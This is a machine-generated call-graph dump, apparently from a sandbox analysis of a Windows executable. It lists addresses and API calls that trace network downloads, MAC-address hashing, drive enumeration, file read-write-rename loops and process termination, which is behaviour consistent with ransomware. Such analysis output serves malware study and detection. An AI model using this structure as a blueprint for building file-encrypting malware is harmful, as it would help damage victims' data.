4251b7 61 API calls 2 library calls 41988->42321 41991 425154 41991->41952 41992 425161 41992->41988 41993 42516c 41992->41993 41994 428c96 __calloc_crt 58 API calls 41993->41994 41995 425179 41994->41995 41996 4251ae 41995->41996 42323 432553 TlsSetValue 41995->42323 42325 4251b7 61 API calls 2 library calls 41996->42325 41999 42518d 41999->41996 42001 425193 41999->42001 42000 4251b3 42000->41952 42324 42508e 58 API calls 4 library calls 42001->42324 42003 42519b GetCurrentThreadId 42003->41952 42005 428760 __ioinit 42004->42005 42326 428af7 42005->42326 42007 428767 42008 428c96 __calloc_crt 58 API calls 42007->42008 42009 428778 42008->42009 42010 4287e3 GetStartupInfoW 42009->42010 42011 428783 __ioinit @_EH4_CallFilterFunc@8 42009->42011 42017 4287f8 42010->42017 42020 428927 42010->42020 42011->41956 42012 4289ef 42335 4289ff LeaveCriticalSection _doexit 42012->42335 42014 428c96 __calloc_crt 58 API calls 42014->42017 42015 428974 GetStdHandle 42015->42020 42016 428987 GetFileType 42016->42020 42017->42014 42019 428846 42017->42019 42017->42020 42018 42887a GetFileType 42018->42019 42019->42018 42019->42020 42333 43263e InitializeCriticalSectionAndSpinCount 42019->42333 42020->42012 42020->42015 42020->42016 42334 43263e InitializeCriticalSectionAndSpinCount 42020->42334 42024 432370 42023->42024 42025 424034 42023->42025 42368 428cde 58 API calls 2 library calls 42024->42368 42029 431f64 GetModuleFileNameW 42025->42029 42027 4323ac FreeEnvironmentStringsW 42027->42025 42028 432396 _signal 42028->42027 42030 431f98 _wparse_cmdline 42029->42030 42032 431fd8 _wparse_cmdline 42030->42032 42369 428cde 58 API calls 2 library calls 42030->42369 42032->41963 42034 4321ba _GetLocaleNameFromLangCountry 42033->42034 42038 42404f 42033->42038 42035 428c96 __calloc_crt 58 API calls 42034->42035 42043 4321e3 _GetLocaleNameFromLangCountry 42035->42043 42036 43223a 42371 420bed 58 API calls 2 library calls 42036->42371 42038->41968 42315 427c2e 58 API calls 3 library calls 42038->42315 42039 428c96 __calloc_crt 58 API calls 42039->42043 42040 43225f 42372 420bed 58 API calls 2 library calls 42040->42372 42043->42036 42043->42038 42043->42039 42043->42040 42044 432276 42043->42044 42370 42962f 58 API calls _vscan_fn 42043->42370 42373 4242fd 8 API calls 2 library calls 42044->42373 42046 432282 42048 427c74 __IsNonwritableInCurrentImage 42047->42048 42374 43aeb5 42048->42374 42050 427c92 __initterm_e 42052 427cb1 __cinit __IsNonwritableInCurrentImage 42050->42052 42377 4219ac 67 API calls __cinit 42050->42377 42052->41971 42054 419fa0 __ftell_nolock 42053->42054 42378 40cf10 42054->42378 42056 419fb0 42057 419fc4 GetCurrentProcess GetLastError SetPriorityClass 42056->42057 42058 419fb4 42056->42058 42060 419fe4 GetLastError 42057->42060 42061 419fe6 42057->42061 42673 4124e0 109 API calls _memset 42058->42673 42060->42061 42063 41d3c0 59 API calls 42061->42063 42062 419fb9 42062->41975 42064 41a00a 42063->42064 42065 41a022 42064->42065 42066 41b669 42064->42066 42070 41d340 59 API calls 42065->42070 42683 44f23e 59 API calls 2 library calls 42066->42683 42068 41b673 42684 44f23e 59 API calls 2 library calls 42068->42684 42072 41a04d 42070->42072 42072->42068 42073 41a065 42072->42073 42392 413a90 42073->42392 42077 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 42078 41a33d GlobalFree 42077->42078 42093 41a196 42077->42093 42080 41a354 42078->42080 42081 41a45c 42078->42081 42079 41a100 42079->42077 42082 412220 76 API calls 42080->42082 42411 412220 42081->42411 42084 41a359 42082->42084 42086 41a466 42084->42086 42426 40ef50 42084->42426 42085 41a1cc lstrcmpW lstrcmpW 42085->42093 42086->41975 42088 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 42088->42093 42089 41a48f 42092 41a4ef 42089->42092 42431 413ea0 42089->42431 42090 420235 60 API calls _TranslateName 42090->42093 42094 411cd0 92 API calls 42092->42094 42093->42078 42093->42085 42093->42088 42093->42090 42095 41a361 42093->42095 42096 41a563 42094->42096 42408 423c92 42095->42408 42100 41a57e 42096->42100 42106 41a5f5 42096->42106 42099 41a395 OpenProcess 42101 41a402 42099->42101 42102 41a3a9 WaitForSingleObject CloseHandle 42099->42102 42104 414690 59 API calls 42100->42104 42109 411cd0 92 API calls 42101->42109 42102->42101 42105 41a3cb 42102->42105 42103 41a6f9 42680 411a10 8 API calls 42103->42680 42108 41a5a9 42104->42108 42122 41a3e2 GlobalFree 42105->42122 42123 41a3d4 Sleep 42105->42123 42674 411ab0 PeekMessageW 42105->42674 42106->42103 42107 41a6fe 42106->42107 42131 41a5db 42106->42131 42111 41a8b6 CreateMutexA 42107->42111 42112 41a70f 42107->42112 42114 414690 59 API calls 42108->42114 42115 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 42109->42115 42117 41a8ca 42111->42117 42116 41a7dc 42112->42116 42127 40ef50 58 API calls 42112->42127 42119 41a5d4 42114->42119 42120 41a451 42115->42120 42124 40ef50 58 API calls 42116->42124 42121 40ef50 58 API calls 42117->42121 42118 41a624 GetVersion 42118->42103 42125 41a632 lstrcpyW lstrcatW lstrcatW 42118->42125 42679 40d240 141 API calls 4 library calls 42119->42679 42120->41975 42135 41a8da 42121->42135 42128 41a3f7 42122->42128 42123->42099 42129 41a7ec 42124->42129 42130 41a674 _memset 42125->42130 42138 41a72f 42127->42138 42128->41975 42132 41a7f1 lstrlenA 42129->42132 42134 41a6b4 ShellExecuteExW 42130->42134 42131->42106 42131->42111 42131->42118 42133 420c62 _malloc 58 API calls 42132->42133 42136 41a810 _memset 42133->42136 42134->42107 42137 41a6e3 42134->42137 42139 413ea0 59 API calls 42135->42139 42151 41a92f 42135->42151 42141 41a81e MultiByteToWideChar lstrcatW 42136->42141 42155 41a9d1 42137->42155 42140 413ea0 59 API calls 42138->42140 42143 41a780 42138->42143 42139->42135 42140->42138 42141->42132 42142 41a847 lstrlenW 42141->42142 42144 41a8a0 CreateMutexA 42142->42144 42145 41a856 42142->42145 42146 41a792 42143->42146 42147 41a79c CreateThread 42143->42147 42144->42117 42452 40e760 42145->42452 42149 413ff0 59 API calls 42146->42149 42147->42116 42152 41a7d0 42147->42152 43965 41dbd0 95 API calls 4 library calls 42147->43965 42149->42147 42150 41a860 CreateThread WaitForSingleObject 42150->42144 43894 41e690 42150->43894 42153 415c10 59 API calls 42151->42153 42152->42116 42154 41a98c 42153->42154 42463 412840 42154->42463 42155->41975 42157 41a997 42468 410fc0 CryptAcquireContextW 42157->42468 42159 41a9ab 42160 41a9c2 lstrlenA 42159->42160 42160->42155 42161 41a9d8 42160->42161 42162 415c10 59 API calls 42161->42162 42163 41aa23 42162->42163 42164 412840 60 API calls 42163->42164 42165 41aa2e lstrcpyA 42164->42165 42167 41aa4b 42165->42167 42168 415c10 59 API calls 42167->42168 42169 41aa90 42168->42169 42170 40ef50 58 API calls 42169->42170 42171 41aaa0 42170->42171 42172 413ea0 59 API calls 42171->42172 42173 41aaf5 42171->42173 42172->42171 42174 413ff0 59 API calls 42173->42174 42175 41ab1d 42174->42175 42491 412900 42175->42491 42177 40ef50 58 API calls 42179 41abc5 42177->42179 42178 41ab28 _memmove 42178->42177 42180 413ea0 59 API calls 42179->42180 42181 41ac1e 42179->42181 42180->42179 42182 413ff0 59 API calls 42181->42182 42183 41ac46 42182->42183 42184 412900 60 API calls 42183->42184 42185 41ac51 _memmove 42184->42185 42186 40ef50 58 API calls 42185->42186 42187 41acee 42186->42187 42188 413ea0 59 API calls 42187->42188 42189 41ad43 42187->42189 42188->42187 42190 413ff0 59 API calls 42189->42190 42191 41ad6b 42190->42191 42192 412900 60 API calls 42191->42192 42195 41ad76 _memmove 42192->42195 42193 415c10 59 API calls 42194 41ae2a 42193->42194 42496 413580 42194->42496 42195->42193 42197 41ae3c 42198 415c10 59 API calls 42197->42198 42199 41ae76 42198->42199 42200 413580 59 API calls 42199->42200 42201 41ae82 42200->42201 42202 415c10 59 API calls 42201->42202 42203 41aebc 42202->42203 42204 413580 59 API calls 42203->42204 42205 41aec8 42204->42205 42206 415c10 59 API calls 42205->42206 42207 41af02 42206->42207 42208 413580 59 API calls 42207->42208 42209 41af0e 42208->42209 42210 415c10 59 API calls 42209->42210 42211 41af48 42210->42211 42212 413580 59 API calls 42211->42212 42213 41af54 42212->42213 42214 415c10 59 API calls 42213->42214 42215 41af8e 42214->42215 42216 413580 59 API calls 42215->42216 42217 41af9a 42216->42217 42218 415c10 59 API calls 42217->42218 42219 41afd4 42218->42219 42220 413580 59 API calls 42219->42220 42221 41afe0 42220->42221 42222 413100 59 API calls 42221->42222 42223 41b001 42222->42223 42224 413580 59 API calls 42223->42224 42225 41b025 42224->42225 42226 413100 59 API calls 42225->42226 42227 41b03c 42226->42227 42228 413580 59 API calls 42227->42228 42229 41b059 42228->42229 42230 413100 59 API calls 42229->42230 42231 41b070 42230->42231 42232 413580 59 API calls 42231->42232 42233 41b07c 42232->42233 42234 413100 59 API calls 42233->42234 42235 41b093 42234->42235 42236 413580 59 API calls 42235->42236 42237 41b09f 42236->42237 42238 413100 59 API calls 42237->42238 42239 41b0b6 42238->42239 42240 413580 59 API calls 42239->42240 42241 41b0c2 42240->42241 42242 413100 59 API calls 42241->42242 42243 41b0d9 42242->42243 42244 413580 59 API calls 42243->42244 42245 41b0e5 42244->42245 42246 413100 59 API calls 42245->42246 42247 41b0fc 42246->42247 42248 413580 59 API calls 42247->42248 42249 41b108 42248->42249 42251 41b130 42249->42251 42681 41cdd0 59 API calls 42249->42681 42252 40ef50 58 API calls 42251->42252 42253 41b16e 42252->42253 42255 41b1a5 GetUserNameW 42253->42255 42503 412de0 42253->42503 42256 41b1c9 42255->42256 42510 412c40 42256->42510 42258 41b1d8 42517 412bf0 42258->42517 42262 41b2f5 42528 4136c0 42262->42528 42266 41b311 42544 4130b0 42266->42544 42268 412c40 59 API calls 42283 41b1f3 42268->42283 42271 412900 60 API calls 42271->42283 42272 41b327 42571 4111c0 CreateFileW 42272->42571 42273 413580 59 API calls 42273->42283 42275 41b33b 42657 41ba10 LoadCursorW RegisterClassExW 42275->42657 42277 413100 59 API calls 42277->42283 42278 41b343 42658 41ba80 CreateWindowExW 42278->42658 42280 41b34b 42280->42155 42661 410a50 GetLogicalDrives 42280->42661 42283->42262 42283->42268 42283->42271 42283->42273 42283->42277 42682 40f1f0 59 API calls 42283->42682 42284 41b379 42285 413100 59 API calls 42284->42285 42286 41b3a5 42285->42286 42287 413580 59 API calls 42286->42287 42310 41b3b3 42287->42310 42288 41b48b 42672 41fdc0 CreateThread 42288->42672 42290 41b49f GetMessageW 42291 41b4ed 42290->42291 42292 41b4bf 42290->42292 42293 41b502 PostThreadMessageW 42291->42293 42294 41b55b 42291->42294 42295 41b4c5 TranslateMessage DispatchMessageW GetMessageW 42292->42295 42297 41b510 PeekMessageW 42293->42297 42298 41b564 PostThreadMessageW 42294->42298 42299 41b5bb 42294->42299 42295->42291 42295->42295 42296 41c330 59 API calls 42296->42310 42300 41b546 WaitForSingleObject 42297->42300 42301 41b526 DispatchMessageW PeekMessageW 42297->42301 42302 41b570 PeekMessageW 42298->42302 42299->42155 42305 41b5d2 CloseHandle 42299->42305 42300->42294 42300->42297 42301->42300 42301->42301 42303 41b5a6 WaitForSingleObject 42302->42303 42304 41b586 DispatchMessageW PeekMessageW 42302->42304 42303->42299 42303->42302 42304->42303 42304->42304 42305->42155 42306 41c240 59 API calls 42306->42310 42307 41b8b0 59 API calls 42307->42310 42308 413260 59 API calls 42308->42310 42310->42288 42310->42296 42310->42306 42310->42307 42310->42308 42671 41fa10 CreateThread 42310->42671 42311->41949 42312->41953 42313->41960 42317->41976 42318->41979 42319->41985 42320->41987 42321->41991 42322->41992 42323->41999 42324->42003 42325->42000 42327 428b1b EnterCriticalSection 42326->42327 42328 428b08 42326->42328 42327->42007 42336 428b9f 42328->42336 42330 428b0e 42330->42327 42360 427c2e 58 API calls 3 library calls 42330->42360 42333->42019 42334->42020 42335->42011 42337 428bab __ioinit 42336->42337 42338 428bb4 42337->42338 42339 428bcc 42337->42339 42361 427f51 58 API calls __NMSG_WRITE 42338->42361 42348 428bed __ioinit 42339->42348 42364 428cde 58 API calls 2 library calls 42339->42364 42341 428bb9 42362 427fae 58 API calls 7 library calls 42341->42362 42344 428be1 42346 428bf7 42344->42346 42347 428be8 42344->42347 42345 428bc0 42363 427b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 42345->42363 42349 428af7 __lock 58 API calls 42346->42349 42351 425208 _vscan_fn 58 API calls 42347->42351 42348->42330 42352 428bfe 42349->42352 42351->42348 42354 428c23 42352->42354 42355 428c0b 42352->42355 42366 420bed 58 API calls 2 library calls 42354->42366 42365 43263e InitializeCriticalSectionAndSpinCount 42355->42365 42358 428c17 42367 428c3f LeaveCriticalSection _doexit 42358->42367 42361->42341 42362->42345 42364->42344 42365->42358 42366->42358 42367->42348 42368->42028 42369->42032 42370->42043 42371->42038 42372->42038 42373->42046 42375 43aeb8 EncodePointer 42374->42375 42375->42375 42376 43aed2 42375->42376 42376->42050 42377->42052 42379 40cf32 _memset __ftell_nolock 42378->42379 42380 40cf4f InternetOpenW 42379->42380 42381 415c10 59 API calls 42380->42381 42382 40cf8a InternetOpenUrlW 42381->42382 42383 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 42382->42383 42391 40cfb2 42382->42391 42685 4156d0 42383->42685 42385 40d000 42386 4156d0 59 API calls 42385->42386 42387 40d049 42386->42387 42387->42391 42704 413010 59 API calls 42387->42704 42389 40d084 42389->42391 42705 413010 59 API calls 42389->42705 42391->42056 42393 413ab2 42392->42393 42400 413ad0 GetModuleFileNameW PathRemoveFileSpecW 42392->42400 42394 413b00 42393->42394 42395 413aba 42393->42395 42708 44f23e 59 API calls 2 library calls 42394->42708 42396 423b4c 59 API calls 42395->42396 42398 413ac7 42396->42398 42398->42400 42709 44f1bb 59 API calls 3 library calls 42398->42709 42402 418400 42400->42402 42403 418437 42402->42403 42407 418446 42402->42407 42403->42407 42710 415d50 59 API calls _signal 42403->42710 42404 4184b9 42404->42079 42407->42404 42711 418d50 59 API calls 42407->42711 42712 431781 42408->42712 42412 42f7c0 __ftell_nolock 42411->42412 42413 41222d 7 API calls 42412->42413 42414 4122bd K32EnumProcesses 42413->42414 42415 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 42413->42415 42416 4122d3 42414->42416 42417 4122df 42414->42417 42415->42414 42416->42084 42418 412353 42417->42418 42419 4122f0 OpenProcess 42417->42419 42418->42084 42420 412346 CloseHandle 42419->42420 42421 41230a K32EnumProcessModules 42419->42421 42420->42418 42420->42419 42421->42420 42422 41231c K32GetModuleBaseNameW 42421->42422 42728 420235 42422->42728 42424 41233e 42424->42420 42425 412345 42424->42425 42425->42420 42427 420c62 _malloc 58 API calls 42426->42427 42430 40ef6e _memset 42427->42430 42428 40efdc 42428->42089 42429 420c62 _malloc 58 API calls 42429->42430 42430->42428 42430->42429 42430->42430 42432 413f05 42431->42432 42438 413eae 42431->42438 42433 413fb1 42432->42433 42434 413f18 42432->42434 42743 44f23e 59 API calls 2 library calls 42433->42743 42436 413fbb 42434->42436 42437 413f2d 42434->42437 42445 413f3d _signal 42434->42445 42744 44f23e 59 API calls 2 library calls 42436->42744 42437->42445 42742 416760 59 API calls 2 library calls 42437->42742 42438->42432 42442 413ed4 42438->42442 42446 413ed9 42442->42446 42447 413eef 42442->42447 42445->42089 42740 413da0 59 API calls _signal 42446->42740 42741 413da0 59 API calls _signal 42447->42741 42450 413eff 42450->42089 42451 413ee9 42451->42089 42745 40e670 42452->42745 42454 40e79e 42455 413ea0 59 API calls 42454->42455 42456 40e7c3 42455->42456 42457 413ff0 59 API calls 42456->42457 42458 40e7ff 42457->42458 42771 40e870 42458->42771 42460 40e806 42461 413ff0 59 API calls 42460->42461 42462 40e80d 42460->42462 42461->42462 42462->42150 43045 413c40 42463->43045 42465 41288c WideCharToMultiByte 43055 4184e0 42465->43055 42467 4128cf 42467->42157 42469 41102b CryptCreateHash 42468->42469 42470 41101a 42468->42470 42472 411045 42469->42472 42473 411056 lstrlenA CryptHashData 42469->42473 43066 430eca RaiseException 42470->43066 43067 430eca RaiseException 42472->43067 42475 41107f CryptGetHashParam 42473->42475 42476 41106e 42473->42476 42477 41109f 42475->42477 42480 4110b0 _memset 42475->42480 43068 430eca RaiseException 42476->43068 43069 430eca RaiseException 42477->43069 42481 4110cf CryptGetHashParam 42480->42481 42482 4110f5 42481->42482 42483 4110e4 42481->42483 42485 420c62 _malloc 58 API calls 42482->42485 43070 430eca RaiseException 42483->43070 42487 411105 _memset 42485->42487 42486 411148 42489 41114e CryptDestroyHash CryptReleaseContext 42486->42489 42487->42486 42488 4204a6 _sprintf 83 API calls 42487->42488 42490 411133 lstrcatA 42488->42490 42489->42159 42490->42486 42490->42487 42492 413a90 59 API calls 42491->42492 42493 41294c MultiByteToWideChar 42492->42493 42494 418400 59 API calls 42493->42494 42495 41298d 42494->42495 42495->42178 42497 413591 42496->42497 42498 4135d6 42496->42498 42497->42498 42499 413597 42497->42499 42502 4135b7 42498->42502 43072 414f70 59 API calls 42498->43072 42499->42502 43071 414f70 59 API calls 42499->43071 42502->42197 42504 412dec 42503->42504 42507 412dfa 42503->42507 42505 413ea0 59 API calls 42504->42505 42506 412df5 42505->42506 42506->42253 42508 413ea0 59 API calls 42507->42508 42509 412e11 42508->42509 42509->42253 42511 412c5f 42510->42511 42513 412c71 42510->42513 42512 4156d0 59 API calls 42511->42512 42514 412c6a 42512->42514 42513->42513 42515 4156d0 59 API calls 42513->42515 42514->42258 42516 412c8a 42515->42516 42516->42258 42518 413ff0 59 API calls 42517->42518 42519 412c13 42518->42519 42520 40ecb0 42519->42520 42521 40ece5 42520->42521 42523 40eefc 42521->42523 43073 421b3b 59 API calls 3 library calls 42521->43073 42523->42283 42524 4156d0 59 API calls 42527 40ed6b _memmove 42524->42527 42525 415230 59 API calls 42525->42527 42527->42523 42527->42524 42527->42525 43074 421b3b 59 API calls 3 library calls 42527->43074 42529 4136e7 42528->42529 42530 413742 42528->42530 42529->42530 42531 4136ed 42529->42531 42534 41370d 42530->42534 43076 414f70 59 API calls 42530->43076 42531->42534 43075 414f70 59 API calls 42531->43075 42533 41377f 42537 40ca70 42533->42537 42534->42533 42536 414690 59 API calls 42534->42536 42536->42533 42538 40cb64 42537->42538 42542 40caa3 42537->42542 42538->42266 42539 40cb6b 43077 44f26c 59 API calls 3 library calls 42539->43077 42541 40cb75 42541->42266 42542->42538 42542->42539 42543 4136c0 59 API calls 42542->42543 42543->42542 42545 414690 59 API calls 42544->42545 42546 4130d4 42545->42546 42547 40c740 42546->42547 43078 420fdd 42547->43078 42550 40c944 CreateDirectoryW 42552 420fdd 115 API calls 42550->42552 42558 40c960 42552->42558 42553 40c90e 42553->42550 42562 40c96a 42553->42562 42554 40c906 43101 423a38 42554->43101 42556 40c9d5 43115 4228fd 82 API calls 6 library calls 42556->43115 42558->42556 42558->42562 43114 4228fd 82 API calls 6 library calls 42558->43114 42560 40c9ed 43116 4228fd 82 API calls 6 library calls 42560->43116 42561 420546 58 API calls 42570 40c79e _memmove 42561->42570 42562->42272 42565 40c9f8 42567 423a38 __fcloseall 83 API calls 42565->42567 42566 415c10 59 API calls 42566->42570 42568 40c9fe 42567->42568 42568->42562 42569 414f70 59 API calls 42569->42570 42570->42554 42570->42561 42570->42566 42570->42569 43088 421101 42570->43088 42572 411223 GetFileSizeEx 42571->42572 42573 4118eb 42571->42573 42574 4112a3 VirtualAlloc 42572->42574 42575 411234 42572->42575 42573->42275 42577 41131a CloseHandle 42574->42577 42582 4112c0 _memset 42574->42582 42575->42574 42576 41123c CloseHandle 42575->42576 42578 413100 59 API calls 42576->42578 42577->42275 42579 411253 42578->42579 42580 4159d0 59 API calls 42579->42580 42585 41126a MoveFileW 42580->42585 42581 4113a7 42584 4113b7 SetFilePointer 42581->42584 42582->42581 42583 4112e9 SetFilePointerEx 42582->42583 42586 411332 ReadFile 42583->42586 42587 41130c VirtualFree 42583->42587 42588 4113f5 ReadFile 42584->42588 42652 4115ae 42584->42652 42585->42573 42593 411287 42585->42593 42586->42587 42589 41134f 42586->42589 42587->42577 42590 411440 42588->42590 42591 41140f VirtualFree CloseHandle 42588->42591 42589->42587 42594 411356 42589->42594 42597 411471 lstrlenA 42590->42597 42598 411718 lstrlenA 42590->42598 42590->42652 42595 41142f 42591->42595 42592 4115c5 SetFilePointerEx 42592->42591 42596 4115df 42592->42596 42593->42275 42594->42584 42601 412c40 59 API calls 42594->42601 42595->42275 42599 4115ed WriteFile 42596->42599 42603 411602 42596->42603 43536 420be4 42597->43536 43614 420be4 42598->43614 42599->42591 42599->42603 42607 411364 42601->42607 42604 4130b0 59 API calls 42603->42604 42605 411631 42604->42605 42609 412840 60 API calls 42605->42609 42607->42581 42617 411379 VirtualFree CloseHandle 42607->42617 42612 41163c WriteFile 42609->42612 42620 411658 42612->42620 42621 411396 42617->42621 42620->42591 42622 411660 lstrlenA WriteFile 42620->42622 42621->42275 42622->42591 42624 411686 CloseHandle 42622->42624 42625 413100 59 API calls 42624->42625 42626 4116a3 42625->42626 43537 4159d0 42626->43537 42629 4116be MoveFileW 42632 4116e4 VirtualFree 42629->42632 42635 4118a7 42629->42635 42636 4116fc 42632->42636 42639 4118e3 42635->42639 42640 4118d5 VirtualFree 42635->42640 42636->42275 42639->42573 42641 4118e8 CloseHandle 42639->42641 42640->42639 42641->42573 42652->42592 42657->42278 42659 41bab9 42658->42659 42660 41babb ShowWindow UpdateWindow 42658->42660 42659->42280 42660->42280 42664 410a81 42661->42664 42662 410bb4 42662->42284 42663 4156d0 59 API calls 42663->42664 42664->42662 42664->42663 42665 413ea0 59 API calls 42664->42665 42668 413ff0 59 API calls 42664->42668 42669 412900 60 API calls 42664->42669 42670 413580 59 API calls 42664->42670 42666 410ae0 SetErrorMode PathFileExistsA SetErrorMode 42665->42666 42666->42664 42667 410b0c GetDriveTypeA 42666->42667 42667->42664 42668->42664 42669->42664 42670->42664 42671->42310 43705 41f130 timeGetTime 42671->43705 42672->42290 43881 41fd80 42672->43881 42673->42062 42675 411ad0 42674->42675 42676 411af4 42674->42676 42677 411afc 42675->42677 42678 411adc DispatchMessageW PeekMessageW 42675->42678 42676->42105 42677->42105 42678->42675 42678->42676 42679->42131 42680->42107 42681->42251 42682->42283 42686 415735 42685->42686 42687 4156de 42685->42687 42688 4157bc 42686->42688 42689 41573e 42686->42689 42687->42686 42696 415704 42687->42696 42707 44f23e 59 API calls 2 library calls 42688->42707 42694 415750 _signal 42689->42694 42706 416760 59 API calls 2 library calls 42689->42706 42694->42385 42698 415709 42696->42698 42699 41571f 42696->42699 42700 413ff0 59 API calls 42698->42700 42701 413ff0 59 API calls 42699->42701 42703 415719 42700->42703 42702 41572f 42701->42702 42702->42385 42703->42385 42704->42389 42705->42391 42706->42694 42710->42407 42711->42407 42715 431570 42712->42715 42716 431580 42715->42716 42717 431586 42716->42717 42722 4315ae 42716->42722 42718 425208 _vscan_fn 58 API calls 42717->42718 42719 43158b 42718->42719 42726 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42719->42726 42724 4315cf wcstoxq 42722->42724 42727 42e883 GetStringTypeW 42722->42727 42723 425208 _vscan_fn 58 API calls 42725 41a36e lstrcpyW lstrcpyW 42723->42725 42724->42723 42724->42725 42725->42099 42726->42725 42727->42722 42729 420241 42728->42729 42730 4202b6 42728->42730 42733 425208 _vscan_fn 58 API calls 42729->42733 42737 420266 42729->42737 42739 4202c8 60 API calls 3 library calls 42730->42739 42732 4202c3 42732->42424 42734 42024d 42733->42734 42738 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42734->42738 42736 420258 42736->42424 42737->42424 42738->42736 42739->42732 42740->42451 42741->42450 42742->42445 42746 420c62 _malloc 58 API calls 42745->42746 42747 40e684 42746->42747 42748 420c62 _malloc 58 API calls 42747->42748 42749 40e690 42748->42749 42750 40e6b4 GetAdaptersInfo 42749->42750 42751 40e699 42749->42751 42752 40e6c4 42750->42752 42753 40e6db GetAdaptersInfo 42750->42753 42754 421f2d _wprintf 85 API calls 42751->42754 42824 420bed 58 API calls 2 library calls 42752->42824 42756 40e741 42753->42756 42757 40e6ea 42753->42757 42758 40e6a3 42754->42758 42825 420bed 58 API calls 2 library calls 42756->42825 42795 4204a6 42757->42795 42823 420bed 58 API calls 2 library calls 42758->42823 42759 40e6ca 42763 420c62 _malloc 58 API calls 42759->42763 42767 40e6d2 42763->42767 42765 40e6a9 42765->42454 42766 40e74a 42766->42454 42767->42751 42767->42753 42769 40e737 42770 421f2d _wprintf 85 API calls 42769->42770 42770->42756 42772 4156d0 59 API calls 42771->42772 42773 40e8bb CryptAcquireContextW 42772->42773 42774 40e8d8 42773->42774 42775 40e8e9 CryptCreateHash 42773->42775 43040 430eca RaiseException 42774->43040 42777 40e903 42775->42777 42778 40e914 CryptHashData 42775->42778 43041 430eca RaiseException 42777->43041 42779 40e932 42778->42779 42780 40e943 CryptGetHashParam 42778->42780 43042 430eca RaiseException 42779->43042 42783 40e963 42780->42783 42785 40e974 _memset 42780->42785 43043 430eca RaiseException 42783->43043 42786 40e993 CryptGetHashParam 42785->42786 42787 40e9a8 42786->42787 42794 40e9b9 42786->42794 43044 430eca RaiseException 42787->43044 42789 40ea10 42791 40ea16 CryptDestroyHash CryptReleaseContext 42789->42791 42790 4204a6 _sprintf 83 API calls 42790->42794 42792 40ea33 42791->42792 42792->42460 42793 413ea0 59 API calls 42793->42794 42794->42789 42794->42790 42794->42793 42794->42794 42796 4204c2 42795->42796 42797 4204d7 42795->42797 42798 425208 _vscan_fn 58 API calls 42796->42798 42797->42796 42799 4204de 42797->42799 42800 4204c7 42798->42800 42827 426ab6 42799->42827 42826 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42800->42826 42803 420504 42804 40e725 42803->42804 42851 4264ef 78 API calls 6 library calls 42803->42851 42806 421f2d 42804->42806 42807 421f39 __ioinit 42806->42807 42808 421f4a 42807->42808 42809 421f5f __stbuf 42807->42809 42810 425208 _vscan_fn 58 API calls 42808->42810 42888 420e92 42809->42888 42811 421f4f 42810->42811 42904 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42811->42904 42814 421f6f __stbuf 42893 42afd2 42814->42893 42815 421f5a __ioinit 42815->42769 42817 421f82 __stbuf 42818 426ab6 __output_l 83 API calls 42817->42818 42819 421f9b __stbuf 42818->42819 42900 42afa1 42819->42900 42823->42765 42824->42759 42825->42766 42826->42804 42852 42019c 42827->42852 42830 425208 _vscan_fn 58 API calls 42831 426b30 42830->42831 42832 427601 42831->42832 42841 426b50 __woutput_p_l __aulldvrm _strlen 42831->42841 42867 42816b 42831->42867 42833 425208 _vscan_fn 58 API calls 42832->42833 42834 427606 42833->42834 42877 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42834->42877 42837 4275db 42860 42a77e 42837->42860 42839 4275fd 42839->42803 42841->42832 42841->42837 42842 42766a 78 API calls _write_multi_char 42841->42842 42843 4271b9 DecodePointer 42841->42843 42846 42721c DecodePointer 42841->42846 42847 4276de 78 API calls _write_string 42841->42847 42848 427241 DecodePointer 42841->42848 42849 43adf7 60 API calls __cftof 42841->42849 42850 4276b2 78 API calls _write_multi_char 42841->42850 42874 422bcc 58 API calls _LocaleUpdate::_LocaleUpdate 42841->42874 42875 428cde 58 API calls 2 library calls 42841->42875 42876 420bed 58 API calls 2 library calls 42841->42876 42842->42841 42843->42841 42846->42841 42847->42841 42848->42841 42849->42841 42850->42841 42851->42804 42853 4201ad 42852->42853 42854 4201fa 42852->42854 42878 425007 42853->42878 42854->42830 42856 4201b3 42857 4201da 42856->42857 42883 4245dc 58 API calls 6 library calls 42856->42883 42857->42854 42884 42495e 58 API calls 6 library calls 42857->42884 42861 42a786 42860->42861 42862 42a788 IsProcessorFeaturePresent 42860->42862 42861->42839 42864 42ab9c 42862->42864 42886 42ab4b 5 API calls ___raise_securityfailure 42864->42886 42866 42ac7f 42866->42839 42868 428175 42867->42868 42869 42818a 42867->42869 42870 425208 _vscan_fn 58 API calls 42868->42870 42869->42841 42871 42817a 42870->42871 42887 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42871->42887 42873 428185 42873->42841 42874->42841 42875->42841 42876->42841 42877->42837 42879 42501f __getptd_noexit 58 API calls 42878->42879 42880 42500d 42879->42880 42881 42501a 42880->42881 42885 427c2e 58 API calls 3 library calls 42880->42885 42881->42856 42883->42857 42884->42854 42886->42866 42887->42873 42889 420eb3 EnterCriticalSection 42888->42889 42890 420e9d 42888->42890 42889->42814 42891 428af7 __lock 58 API calls 42890->42891 42892 420ea6 42891->42892 42892->42814 42894 42816b __filbuf 58 API calls 42893->42894 42895 42afdf 42894->42895 42906 4389c2 42895->42906 42897 42b034 42897->42817 42898 42afe5 __stbuf 42898->42897 42915 428cde 58 API calls 2 library calls 42898->42915 42901 42afaa 42900->42901 42902 421faf 42900->42902 42901->42902 42917 42836b 42901->42917 42905 421fc9 LeaveCriticalSection LeaveCriticalSection __stbuf __getstream 42902->42905 42904->42815 42905->42815 42907 4389da 42906->42907 42908 4389cd 42906->42908 42910 425208 _vscan_fn 58 API calls 42907->42910 42911 4389e6 42907->42911 42909 425208 _vscan_fn 58 API calls 42908->42909 42913 4389d2 42909->42913 42912 438a07 42910->42912 42911->42898 42916 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42912->42916 42913->42898 42915->42897 42916->42913 42918 42837e 42917->42918 42922 4283a2 42917->42922 42919 42816b __filbuf 58 API calls 42918->42919 42918->42922 42920 42839b 42919->42920 42923 42df14 42920->42923 42922->42902 42924 42df20 __ioinit 